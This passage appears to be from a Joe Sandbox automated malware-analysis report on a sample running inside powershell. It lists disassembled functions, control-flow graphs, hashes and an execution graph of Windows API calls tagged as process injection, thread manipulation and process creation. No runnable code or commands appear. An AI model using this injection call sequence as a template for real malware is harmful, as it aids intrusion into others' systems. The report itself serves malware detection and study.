Function_00007FFBAC380296 72 Function_00007FFBAC2B0493 73 Function_00007FFBAC2B2C9A 74 Function_00007FFBAC2B2498 75 Function_00007FFBAC2B048D 76 Function_00007FFBAC2B2C8D 77 Function_00007FFBAC2B218B 78 Function_00007FFBAC2B228B 79->79 80 Function_00007FFBAC2B1485 81 Function_00007FFBAC2B0583 82 Function_00007FFBAC2B0B83 83 Function_00007FFBAC2B0C83 84 Function_00007FFBAC2B2D7D 85 Function_00007FFBAC380038 86 Function_00007FFBAC2B4281 87 Function_00007FFBAC2B207F 88->47 88->54 88->62 89 Function_00007FFBAC2B1380 90 Function_00007FFBAC2B3C75 90->35 91 Function_00007FFBAC2B1679 92 Function_00007FFBAC2B287A 93 Function_00007FFBAC2B2B7A 93->79 94 Function_00007FFBAC2B0F77 95 Function_00007FFBAC2B056F 96 Function_00007FFBAC2B2D5C 97 Function_00007FFBAC2B2A60 97->79 98 Function_00007FFBAC380F53

                                          Executed Functions

                                          Function 00007FFBAC3805E5 Relevance: 1.1, Instructions: 1051COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 114 7ffbac3805e5-7ffbac380659 123 7ffbac38065c-7ffbac38066d 114->123 124 7ffbac38065b 114->124 125 7ffbac380670-7ffbac380709 123->125 126 7ffbac38066f 123->126 124->123 130 7ffbac38070f-7ffbac380719 125->130 131 7ffbac38085b-7ffbac38090b 125->131 126->125 132 7ffbac380732-7ffbac380737 130->132 133 7ffbac38071b-7ffbac380730 130->133 175 7ffbac380912-7ffbac380923 131->175 176 7ffbac38090d 131->176 134 7ffbac38073d-7ffbac380740 132->134 135 7ffbac3807f8-7ffbac380802 132->135 133->132 138 7ffbac380742-7ffbac380755 134->138 139 7ffbac380789 134->139 141 7ffbac380804-7ffbac380812 135->141 142 7ffbac380813-7ffbac380858 135->142 138->131 152 7ffbac38075b-7ffbac380765 138->152 146 7ffbac38078b-7ffbac38078d 139->146 142->131 146->135 149 7ffbac38078f-7ffbac380792 146->149 149->135 150 7ffbac380794-7ffbac38079a 149->150 154 7ffbac38079c-7ffbac3807b7 150->154 155 7ffbac3807b9-7ffbac3807cf 150->155 156 7ffbac38077e-7ffbac380787 152->156 157 7ffbac380767-7ffbac380774 152->157 154->155 166 7ffbac3807d1-7ffbac3807de 155->166 167 7ffbac3807e8-7ffbac3807f7 155->167 156->146 157->156 164 7ffbac380776-7ffbac38077c 157->164 164->156 166->167 171 7ffbac3807e0-7ffbac3807e6 166->171 171->167 178 7ffbac38092a-7ffbac380971 175->178 179 7ffbac380925 175->179 176->175 177 7ffbac38090f 176->177 177->175 180 7ffbac380926-7ffbac380928 178->180 183 7ffbac380973-7ffbac380980 178->183 179->178 179->180 180->178 184 7ffbac380982-7ffbac380989 183->184 185 7ffbac38098b-7ffbac3809b9 183->185 184->185 187 7ffbac3809bf-7ffbac3809c9 185->187 188 7ffbac380b08-7ffbac380b95 185->188 189 7ffbac3809e2-7ffbac3809e7 187->189 190 7ffbac3809cb-7ffbac3809e0 187->190 227 7ffbac380b96-7ffbac380bb7 188->227 193 7ffbac3809ed-7ffbac3809f0 189->193 194 7ffbac380aa5-7ffbac380aaf 189->194 190->189 198 7ffbac3809f2-7ffbac380a05 193->198 199 7ffbac380a39 193->199 196 7ffbac380ab1-7ffbac380abf 194->196 197 7ffbac380ac0-7ffbac380b05 194->197 197->188 198->188 210 7ffbac380a0b-7ffbac380a15 198->210 201 7ffbac380a3b-7ffbac380a3d 199->201 201->194 205 7ffbac380a3f-7ffbac380a42 201->205 205->194 208 7ffbac380a44-7ffbac380a4a 205->208 211 7ffbac380a4c-7ffbac380a67 208->211 212 7ffbac380a69-7ffbac380a7c 208->212 213 7ffbac380a2e-7ffbac380a37 210->213 214 7ffbac380a17-7ffbac380a24 210->214 211->212 221 7ffbac380a7e-7ffbac380a8b 212->221 222 7ffbac380a95-7ffbac380aa4 212->222 213->201 214->213 219 7ffbac380a26-7ffbac380a2c 214->219 219->213 221->222 228 7ffbac380a8d-7ffbac380a93 221->228 232 7ffbac380bbe-7ffbac380bcf 227->232 233 7ffbac380bb9 227->233 228->222 235 7ffbac380bd1 232->235 236 7ffbac380bd6-7ffbac380be9 232->236 233->232 234 7ffbac380bbb 233->234 234->232 235->236 237 7ffbac380bd3 235->237 236->227 238 7ffbac380beb-7ffbac380c6f 236->238 237->236 240 7ffbac380e08-7ffbac380e37 238->240 241 7ffbac380c75-7ffbac380c7f 238->241 242 7ffbac380c81-7ffbac380c8f 241->242 243 7ffbac380c99-7ffbac380c9f 241->243 242->243 251 7ffbac380c91-7ffbac380c97 242->251 246 7ffbac380d9d-7ffbac380da7 243->246 247 7ffbac380ca5-7ffbac380ca8 243->247 249 7ffbac380dba-7ffbac380e05 246->249 250 7ffbac380da9-7ffbac380db9 246->250 252 7ffbac380cf1 247->252 253 7ffbac380caa-7ffbac380cbd 247->253 249->240 251->243 254 7ffbac380cf3-7ffbac380cf5 252->254 253->240 259 7ffbac380cc3-7ffbac380ccd 253->259 254->246 257 7ffbac380cfb-7ffbac380cfe 254->257 257->246 260 7ffbac380d04-7ffbac380d07 257->260 262 7ffbac380ccf-7ffbac380ce4 259->262 263 7ffbac380ce6-7ffbac380cef 259->263 260->246 264 7ffbac380d0d-7ffbac380d4a 260->264 262->263 263->254 264->246 271 7ffbac380d4c-7ffbac380d52 264->271 272 7ffbac380d71-7ffbac380d87 271->272 273 7ffbac380d54-7ffbac380d6f 271->273 275 7ffbac380d8d-7ffbac380d9c 272->275 273->272
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399511867.00007FFBAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac380000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d0b2b1f5fd1735ae499d87bd829b5c3812c701e8d933f66075de44f600d0514f
                                          • Instruction ID: 49f39fdbe66ad20eb11bbdf26fd3d4cac0ff430cd1613ae6012c23e21a2b4396
                                          • Opcode Fuzzy Hash: d0b2b1f5fd1735ae499d87bd829b5c3812c701e8d933f66075de44f600d0514f
                                          • Instruction Fuzzy Hash: 1B6218B190EF894FE797973898595B57BE1EF86220B0801FBD84DC71A3D928EC06C395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFBAC38047E Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399511867.00007FFBAC380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC380000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac380000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: jt#$jt#
                                          • API String ID: 0-902709449
                                          • Opcode ID: a4f679ce81e086c1fe9e68b68b373c7a45f2bee996f194fda4f75f256c9ccef0
                                          • Instruction ID: 00c15cc8640c6c2f29329996f1807d110c3d8d2af79e24990935e87fc8532a34
                                          • Opcode Fuzzy Hash: a4f679ce81e086c1fe9e68b68b373c7a45f2bee996f194fda4f75f256c9ccef0
                                          • Instruction Fuzzy Hash: 6B4119E2B0ED5A0FFBA6D63C9455AF963D1EF44720B08017AD84EC31D2DD28EC054399
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFBAC2B48A4 Relevance: 1.9, APIs: 1, Instructions: 439processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: eeb6d813cbbf3de8023c99d6feaf2d6505a14c9bc4909965def0b4bf97d6088f
                                          • Instruction ID: 3709dd43352562e5edacc15c9b0fec5386e94da63f3223d6eaca7db5c3901c7f
                                          • Opcode Fuzzy Hash: eeb6d813cbbf3de8023c99d6feaf2d6505a14c9bc4909965def0b4bf97d6088f
                                          • Instruction Fuzzy Hash: 14D19571918B8D4FDB65EF28C89A7E977D1FB58310F00422EDC4EC7295DE74A9418B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFBAC2B4144 Relevance: 1.6, APIs: 1, Instructions: 148injectionCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 58203cf197c0dc2159e6cb913134c99d8ce361a01f8a80f2564058120d469cb1
                                          • Instruction ID: b2c656bdaad2308de82b97e748d44af6c974831e12513d57d27edf8fe4637ed6
                                          • Opcode Fuzzy Hash: 58203cf197c0dc2159e6cb913134c99d8ce361a01f8a80f2564058120d469cb1
                                          • Instruction Fuzzy Hash: 8D41E67191CB1C4FDB18EF9998456F97BE0EB95311F00426FE44AD3252CE74A846CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFBAC2B3F38 Relevance: 1.6, APIs: 1, Instructions: 129threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 9991abe5afb07461934d0e0ac11a14e6ac02e354524dade890c58971f3753b06
                                          • Instruction ID: 78031759fa1a51546002d2566e26fb6f3dff3546236556e146ee4ff7eb75bf06
                                          • Opcode Fuzzy Hash: 9991abe5afb07461934d0e0ac11a14e6ac02e354524dade890c58971f3753b06
                                          • Instruction Fuzzy Hash: 60312871C0CB184FDB29EFA898496F97BE0EB55321F04423FD04AD3292DF74A44A8791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FFBAC2B3E3D Relevance: 1.6, APIs: 1, Instructions: 117threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 102 7ffbac2b3e3d-7ffbac2b3e49 103 7ffbac2b3e54-7ffbac2b3e63 102->103 104 7ffbac2b3e4b-7ffbac2b3e53 102->104 105 7ffbac2b3e65-7ffbac2b3e6d 103->105 106 7ffbac2b3e6e-7ffbac2b3f04 ResumeThread 103->106 104->103 105->106 111 7ffbac2b3f06 106->111 112 7ffbac2b3f0c-7ffbac2b3f31 106->112 111->112
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.399371540.00007FFBAC2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC2B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_7ffbac2b0000_powershell.jbxd
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          • Opcode ID: 794bb1f1d963e6d09eb480e56da070ed666276f0fc2d96879229f37d25c928d4
                                          • Instruction ID: f820a98479350abf5ac7b17bfe8567540a2318755d8463499466d1771ad5c50c
                                          • Opcode Fuzzy Hash: 794bb1f1d963e6d09eb480e56da070ed666276f0fc2d96879229f37d25c928d4
                                          • Instruction Fuzzy Hash: 7F31167190D7884FDB1ADB6888566E97FB0EF57320F0442AFD049C72A7CA78A406CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:4%
                                          Dynamic/Decrypted Code Coverage:2.8%
                                          Signature Coverage:5.9%
                                          Total number of Nodes:545
                                          Total number of Limit Nodes:68
                                          execution_graph 33351 41efd0 33354 41b960 33351->33354 33355 41b986 33354->33355 33362 409d30 33355->33362 33357 41b992 33358 41b9b3 33357->33358 33370 40c1b0 33357->33370 33360 41b9a5 33406 41a6a0 33360->33406 33365 409d3d 33362->33365 33409 409c80 33362->33409 33364 409d44 33364->33357 33365->33364 33421 409c20 33365->33421 33371 40c1d5 33370->33371 33825 40b1b0 33371->33825 33373 40c22c 33829 40ae30 33373->33829 33375 40c4a3 33375->33360 33376 40c252 33376->33375 33838 414390 33376->33838 33378 40c297 33378->33375 33841 408a60 33378->33841 33380 40c2db 33380->33375 33848 41a4f0 33380->33848 33384 40c331 33385 40c338 33384->33385 33860 41a000 33384->33860 33387 41bdb0 2 API calls 33385->33387 33389 40c345 33387->33389 33389->33360 33390 40c382 33391 41bdb0 2 API calls 33390->33391 33392 40c389 33391->33392 33392->33360 33393 40c392 33394 40f490 3 API calls 33393->33394 33395 40c406 33394->33395 33395->33385 33396 40c411 33395->33396 33397 41bdb0 2 API calls 33396->33397 33398 40c435 33397->33398 33865 41a050 33398->33865 33401 41a000 2 API calls 33402 40c470 33401->33402 33402->33375 33870 419e10 33402->33870 33405 41a6a0 2 API calls 33405->33375 33407 41a6bf ExitProcess 33406->33407 33408 41af50 LdrLoadDll 33406->33408 33408->33407 33440 418bb0 33409->33440 33413 409ca6 33413->33365 33414 409c9c 33414->33413 33447 41b2a0 33414->33447 33416 409ce3 33416->33413 33458 409aa0 33416->33458 33418 409d03 33464 409620 LdrLoadDll 33418->33464 33420 409d15 33420->33365 33422 409c3a 33421->33422 33423 41b590 LdrLoadDll 33421->33423 33800 41b590 33422->33800 33423->33422 33426 41b590 LdrLoadDll 33427 409c61 33426->33427 33428 40f170 33427->33428 33429 40f189 33428->33429 33808 40b030 33429->33808 33431 40f19c 33812 41a1d0 33431->33812 33434 409d55 33434->33357 33436 40f1c2 33437 40f1ed 33436->33437 33818 41a250 33436->33818 33439 41a480 2 API calls 33437->33439 33439->33434 33441 418bbf 33440->33441 33465 414e40 33441->33465 33443 409c93 33444 418a60 33443->33444 33471 41a5f0 33444->33471 33448 41b2b9 33447->33448 33478 414a40 33448->33478 33450 41b2d1 33451 41b2da 33450->33451 33517 41b0e0 33450->33517 33451->33416 33453 41b2ee 33453->33451 33535 419ef0 33453->33535 33455 41b322 33455->33455 33540 41bdb0 33455->33540 33778 407ea0 33458->33778 33460 409ac1 33460->33418 33461 409aba 33461->33460 33791 408160 33461->33791 33464->33420 33466 414e4e 33465->33466 33467 414e5a 33465->33467 33466->33467 33470 4152c0 LdrLoadDll 33466->33470 33467->33443 33469 414fac 33469->33443 33470->33469 33472 418a75 33471->33472 33474 41af50 33471->33474 33472->33414 33475 41af60 33474->33475 33476 41af82 33474->33476 33477 414e40 LdrLoadDll 33475->33477 33476->33472 33477->33476 33479 414d75 33478->33479 33480 414a54 33478->33480 33479->33450 33480->33479 33543 419c40 33480->33543 33483 414b80 33546 41a350 33483->33546 33484 414b63 33603 41a450 LdrLoadDll 33484->33603 33487 414b6d 33487->33450 33488 414ba7 33489 41bdb0 2 API calls 33488->33489 33491 414bb3 33489->33491 33490 414d39 33493 41a480 2 API calls 33490->33493 33491->33487 33491->33490 33492 414d4f 33491->33492 33497 414c42 33491->33497 33612 414780 LdrLoadDll NtReadFile NtClose 33492->33612 33494 414d40 33493->33494 33494->33450 33496 414d62 33496->33450 33498 414ca9 33497->33498 33500 414c51 33497->33500 33498->33490 33499 414cbc 33498->33499 33605 41a2d0 33499->33605 33502 414c56 33500->33502 33503 414c6a 33500->33503 33604 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33502->33604 33506 414c87 33503->33506 33507 414c6f 33503->33507 33506->33494 33561 414400 33506->33561 33549 4146e0 33507->33549 33509 414c60 33509->33450 33511 414d1c 33609 41a480 33511->33609 33512 414c7d 33512->33450 33515 414c9f 33515->33450 33516 414d28 33516->33450 33519 41b0f1 33517->33519 33518 41b103 33518->33453 33519->33518 33630 41bd30 33519->33630 33521 41b124 33633 414060 33521->33633 33523 41b170 33523->33453 33524 41b147 33524->33523 33525 414060 3 API calls 33524->33525 33528 41b169 33525->33528 33527 41b1fa 33529 41b20a 33527->33529 33752 41aef0 LdrLoadDll 33527->33752 33528->33523 33658 415380 33528->33658 33668 41ad60 33529->33668 33532 41b238 33747 419eb0 33532->33747 33536 41af50 LdrLoadDll 33535->33536 33537 419f0c 33536->33537 33772 3a6967a 33537->33772 33538 419f27 33538->33455 33541 41b349 33540->33541 33775 41a660 33540->33775 33541->33416 33544 41af50 LdrLoadDll 33543->33544 33545 414b34 33544->33545 33545->33483 33545->33484 33545->33487 33547 41a36c NtCreateFile 33546->33547 33548 41af50 LdrLoadDll 33546->33548 33547->33488 33548->33547 33550 4146fc 33549->33550 33551 41a2d0 LdrLoadDll 33550->33551 33552 41471d 33551->33552 33553 414724 33552->33553 33554 414738 33552->33554 33556 41a480 2 API calls 33553->33556 33555 41a480 2 API calls 33554->33555 33558 414741 33555->33558 33557 41472d 33556->33557 33557->33512 33613 41bfc0 LdrLoadDll RtlAllocateHeap 33558->33613 33560 41474c 33560->33512 33562 41444b 33561->33562 33563 41447e 33561->33563 33564 41a2d0 LdrLoadDll 33562->33564 33565 4145c9 33563->33565 33569 41449a 33563->33569 33566 414466 33564->33566 33567 41a2d0 LdrLoadDll 33565->33567 33568 41a480 2 API calls 33566->33568 33573 4145e4 33567->33573 33570 41446f 33568->33570 33571 41a2d0 LdrLoadDll 33569->33571 33570->33515 33572 4144b5 33571->33572 33575 4144d1 33572->33575 33576 4144bc 33572->33576 33626 41a310 LdrLoadDll 33573->33626 33577 4144d6 33575->33577 33584 4144ec 33575->33584 33579 41a480 2 API calls 33576->33579 33580 41a480 2 API calls 33577->33580 33578 41461e 33581 41a480 2 API calls 33578->33581 33582 4144c5 33579->33582 33583 4144df 33580->33583 33585 414629 33581->33585 33582->33515 33583->33515 33586 4144f1 33584->33586 33614 41bf80 33584->33614 33585->33515 33591 414503 33586->33591 33617 41a400 33586->33617 33589 414557 33590 41456e 33589->33590 33625 41a290 LdrLoadDll 33589->33625 33593 414575 33590->33593 33594 41458a 33590->33594 33591->33515 33595 41a480 2 API calls 33593->33595 33596 41a480 2 API calls 33594->33596 33595->33591 33597 414593 33596->33597 33598 4145bf 33597->33598 33620 41bb80 33597->33620 33598->33515 33600 4145aa 33601 41bdb0 2 API calls 33600->33601 33602 4145b3 33601->33602 33602->33515 33603->33487 33604->33509 33606 41af50 LdrLoadDll 33605->33606 33607 414d04 33606->33607 33608 41a310 LdrLoadDll 33607->33608 33608->33511 33610 41a49c NtClose 33609->33610 33611 41af50 LdrLoadDll 33609->33611 33610->33516 33611->33610 33612->33496 33613->33560 33627 41a620 33614->33627 33616 41bf98 33616->33586 33618 41a41c NtReadFile 33617->33618 33619 41af50 LdrLoadDll 33617->33619 33618->33589 33619->33618 33621 41bba4 33620->33621 33622 41bb8d 33620->33622 33621->33600 33622->33621 33623 41bf80 2 API calls 33622->33623 33624 41bbbb 33623->33624 33624->33600 33625->33590 33626->33578 33628 41af50 LdrLoadDll 33627->33628 33629 41a63c RtlAllocateHeap 33628->33629 33629->33616 33753 41a530 33630->33753 33632 41bd5d 33632->33521 33634 414071 33633->33634 33635 414079 33633->33635 33634->33524 33657 41434c 33635->33657 33756 41cf20 33635->33756 33637 4140cd 33638 41cf20 2 API calls 33637->33638 33639 4140d8 33638->33639 33640 414126 33639->33640 33764 41cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 33639->33764 33642 41cf20 2 API calls 33640->33642 33644 41413a 33642->33644 33643 41cf20 2 API calls 33646 4141ad 33643->33646 33644->33643 33645 41cf20 2 API calls 33653 4141f5 33645->33653 33646->33645 33649 41cf80 2 API calls 33650 41432e 33649->33650 33651 41cf80 2 API calls 33650->33651 33652 414338 33651->33652 33654 41cf80 2 API calls 33652->33654 33761 41cf80 33653->33761 33655 414342 33654->33655 33656 41cf80 2 API calls 33655->33656 33656->33657 33657->33524 33659 415391 33658->33659 33660 414a40 8 API calls 33659->33660 33662 4153a7 33660->33662 33661 4153fa 33661->33527 33662->33661 33663 4153e2 33662->33663 33664 4153f5 33662->33664 33665 41bdb0 2 API calls 33663->33665 33666 41bdb0 2 API calls 33664->33666 33667 4153e7 33665->33667 33666->33661 33667->33527 33669 41ad74 33668->33669 33670 41ac20 LdrLoadDll 33668->33670 33765 41ac20 33669->33765 33670->33669 33672 41ad7d 33673 41ac20 LdrLoadDll 33672->33673 33674 41ad86 33673->33674 33675 41ac20 LdrLoadDll 33674->33675 33676 41ad8f 33675->33676 33677 41ac20 LdrLoadDll 33676->33677 33678 41ad98 33677->33678 33679 41ac20 LdrLoadDll 33678->33679 33680 41ada1 33679->33680 33681 41ac20 LdrLoadDll 33680->33681 33682 41adad 33681->33682 33683 41ac20 LdrLoadDll 33682->33683 33684 41adb6 33683->33684 33685 41ac20 LdrLoadDll 33684->33685 33686 41adbf 33685->33686 33687 41ac20 LdrLoadDll 33686->33687 33688 41adc8 33687->33688 33689 41ac20 LdrLoadDll 33688->33689 33690 41add1 33689->33690 33691 41ac20 LdrLoadDll 33690->33691 33692 41adda 33691->33692 33693 41ac20 LdrLoadDll 33692->33693 33694 41ade6 33693->33694 33695 41ac20 LdrLoadDll 33694->33695 33696 41adef 33695->33696 33697 41ac20 LdrLoadDll 33696->33697 33698 41adf8 33697->33698 33699 41ac20 LdrLoadDll 33698->33699 33700 41ae01 33699->33700 33701 41ac20 LdrLoadDll 33700->33701 33702 41ae0a 33701->33702 33703 41ac20 LdrLoadDll 33702->33703 33704 41ae13 33703->33704 33705 41ac20 LdrLoadDll 33704->33705 33706 41ae1f 33705->33706 33707 41ac20 LdrLoadDll 33706->33707 33708 41ae28 33707->33708 33709 41ac20 LdrLoadDll 33708->33709 33710 41ae31 33709->33710 33711 41ac20 LdrLoadDll 33710->33711 33712 41ae3a 33711->33712 33713 41ac20 LdrLoadDll 33712->33713 33714 41ae43 33713->33714 33715 41ac20 LdrLoadDll 33714->33715 33716 41ae4c 33715->33716 33717 41ac20 LdrLoadDll 33716->33717 33718 41ae58 33717->33718 33719 41ac20 LdrLoadDll 33718->33719 33720 41ae61 33719->33720 33721 41ac20 LdrLoadDll 33720->33721 33722 41ae6a 33721->33722 33723 41ac20 LdrLoadDll 33722->33723 33724 41ae73 33723->33724 33725 41ac20 LdrLoadDll 33724->33725 33726 41ae7c 33725->33726 33727 41ac20 LdrLoadDll 33726->33727 33728 41ae85 33727->33728 33729 41ac20 LdrLoadDll 33728->33729 33730 41ae91 33729->33730 33731 41ac20 LdrLoadDll 33730->33731 33732 41ae9a 33731->33732 33733 41ac20 LdrLoadDll 33732->33733 33734 41aea3 33733->33734 33735 41ac20 LdrLoadDll 33734->33735 33736 41aeac 33735->33736 33737 41ac20 LdrLoadDll 33736->33737 33738 41aeb5 33737->33738 33739 41ac20 LdrLoadDll 33738->33739 33740 41aebe 33739->33740 33741 41ac20 LdrLoadDll 33740->33741 33742 41aeca 33741->33742 33743 41ac20 LdrLoadDll 33742->33743 33744 41aed3 33743->33744 33745 41ac20 LdrLoadDll 33744->33745 33746 41aedc 33745->33746 33746->33532 33748 41af50 LdrLoadDll 33747->33748 33749 419ecc 33748->33749 33771 3a69860 LdrInitializeThunk 33749->33771 33750 419ee3 33750->33453 33752->33529 33754 41af50 LdrLoadDll 33753->33754 33755 41a54c NtAllocateVirtualMemory 33754->33755 33755->33632 33757 41cf30 33756->33757 33758 41cf36 33756->33758 33757->33637 33759 41bf80 2 API calls 33758->33759 33760 41cf5c 33759->33760 33760->33637 33762 414324 33761->33762 33763 41bdb0 2 API calls 33761->33763 33762->33649 33763->33762 33764->33639 33766 41ac3b 33765->33766 33767 414e40 LdrLoadDll 33766->33767 33768 41ac5b 33767->33768 33769 414e40 LdrLoadDll 33768->33769 33770 41ad07 33768->33770 33769->33770 33770->33672 33770->33770 33771->33750 33773 3a69681 33772->33773 33774 3a6968f LdrInitializeThunk 33772->33774 33773->33538 33774->33538 33776 41a67c RtlFreeHeap 33775->33776 33777 41af50 LdrLoadDll 33775->33777 33776->33541 33777->33776 33779 407eb0 33778->33779 33780 407eab 33778->33780 33781 41bd30 2 API calls 33779->33781 33780->33461 33787 407ed5 33781->33787 33782 407f38 33782->33461 33783 419eb0 2 API calls 33783->33787 33784 407f3e 33786 407f64 33784->33786 33788 41a5b0 2 API calls 33784->33788 33786->33461 33787->33782 33787->33783 33787->33784 33789 41bd30 2 API calls 33787->33789 33794 41a5b0 33787->33794 33790 407f55 33788->33790 33789->33787 33790->33461 33792 40817e 33791->33792 33793 41a5b0 2 API calls 33791->33793 33792->33418 33793->33792 33795 41af50 LdrLoadDll 33794->33795 33796 41a5cc 33795->33796 33797 41a5e3 33796->33797 33799 3a696e0 LdrInitializeThunk 33796->33799 33797->33787 33799->33797 33801 41b5b3 33800->33801 33804 40ace0 33801->33804 33805 40ad04 33804->33805 33806 40ad40 LdrLoadDll 33805->33806 33807 409c4b 33805->33807 33806->33807 33807->33426 33809 40b053 33808->33809 33811 40b0d0 33809->33811 33823 419c80 LdrLoadDll 33809->33823 33811->33431 33813 41af50 LdrLoadDll 33812->33813 33814 40f1ab 33813->33814 33814->33434 33815 41a7c0 33814->33815 33816 41af50 LdrLoadDll 33815->33816 33817 41a7df LookupPrivilegeValueW 33816->33817 33817->33436 33819 41af50 LdrLoadDll 33818->33819 33820 41a26c 33819->33820 33824 3a69910 LdrInitializeThunk 33820->33824 33821 41a28b 33821->33437 33823->33811 33824->33821 33826 40b1e0 33825->33826 33827 40b030 LdrLoadDll 33826->33827 33828 40b1f4 33827->33828 33828->33373 33830 40ae41 33829->33830 33831 40ae3d 33829->33831 33832 40ae5a 33830->33832 33833 40ae8c 33830->33833 33831->33376 33875 419cc0 LdrLoadDll 33832->33875 33876 419cc0 LdrLoadDll 33833->33876 33835 40ae9d 33835->33376 33837 40ae7c 33837->33376 33839 40f490 3 API calls 33838->33839 33840 4143b6 33839->33840 33840->33378 33877 4087a0 33841->33877 33844 408a9d 33844->33380 33845 4087a0 19 API calls 33846 408a8a 33845->33846 33846->33844 33895 40f700 10 API calls 33846->33895 33849 41af50 LdrLoadDll 33848->33849 33850 41a50c 33849->33850 34014 3a698f0 LdrInitializeThunk 33850->34014 33851 40c312 33853 40f490 33851->33853 33854 40f4ad 33853->33854 34015 419fb0 33854->34015 33856 40f4f5 33856->33384 33858 41a000 2 API calls 33859 40f51e 33858->33859 33859->33384 33861 41af50 LdrLoadDll 33860->33861 33862 41a01c 33861->33862 34021 3a69780 LdrInitializeThunk 33862->34021 33863 40c375 33863->33390 33863->33393 33866 41af50 LdrLoadDll 33865->33866 33867 41a06c 33866->33867 34022 3a697a0 LdrInitializeThunk 33867->34022 33868 40c449 33868->33401 33871 41af50 LdrLoadDll 33870->33871 33872 419e2c 33871->33872 34023 3a69a20 LdrInitializeThunk 33872->34023 33873 40c49c 33873->33405 33875->33837 33876->33835 33878 407ea0 4 API calls 33877->33878 33893 4087ba 33877->33893 33878->33893 33879 408a49 33879->33844 33879->33845 33880 408a3f 33881 408160 2 API calls 33880->33881 33881->33879 33884 419ef0 2 API calls 33884->33893 33886 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33886->33893 33887 41a480 LdrLoadDll NtClose 33887->33893 33892 419e10 2 API calls 33892->33893 33893->33879 33893->33880 33893->33884 33893->33886 33893->33887 33893->33892 33896 419d00 33893->33896 33899 4085d0 33893->33899 33911 40f5e0 LdrLoadDll NtClose 33893->33911 33912 419d80 LdrLoadDll 33893->33912 33913 419db0 LdrLoadDll 33893->33913 33914 419e40 LdrLoadDll 33893->33914 33915 4083a0 33893->33915 33931 405f60 LdrLoadDll 33893->33931 33895->33844 33897 419d1c 33896->33897 33898 41af50 LdrLoadDll 33896->33898 33897->33893 33898->33897 33900 4085e6 33899->33900 33932 419870 33900->33932 33902 4085ff 33907 408771 33902->33907 33953 4081a0 33902->33953 33904 4086e5 33905 4083a0 11 API calls 33904->33905 33904->33907 33906 408713 33905->33906 33906->33907 33908 419ef0 2 API calls 33906->33908 33907->33893 33909 408748 33908->33909 33909->33907 33910 41a4f0 2 API calls 33909->33910 33910->33907 33911->33893 33912->33893 33913->33893 33914->33893 33916 4083c9 33915->33916 33993 408310 33916->33993 33919 41a4f0 2 API calls 33920 4083dc 33919->33920 33920->33919 33921 408467 33920->33921 33923 408462 33920->33923 34001 40f660 33920->34001 33921->33893 33922 41a480 2 API calls 33924 40849a 33922->33924 33923->33922 33924->33921 33925 419d00 LdrLoadDll 33924->33925 33926 4084ff 33925->33926 33926->33921 34005 419d40 33926->34005 33928 408563 33928->33921 33929 414a40 8 API calls 33928->33929 33930 4085b8 33929->33930 33930->33893 33931->33893 33933 41bf80 2 API calls 33932->33933 33934 419887 33933->33934 33960 409310 33934->33960 33936 4198a2 33937 4198e0 33936->33937 33938 4198c9 33936->33938 33941 41bd30 2 API calls 33937->33941 33939 41bdb0 2 API calls 33938->33939 33940 4198d6 33939->33940 33940->33902 33942 41991a 33941->33942 33943 41bd30 2 API calls 33942->33943 33944 419933 33943->33944 33948 419bd4 33944->33948 33966 41bd70 33944->33966 33947 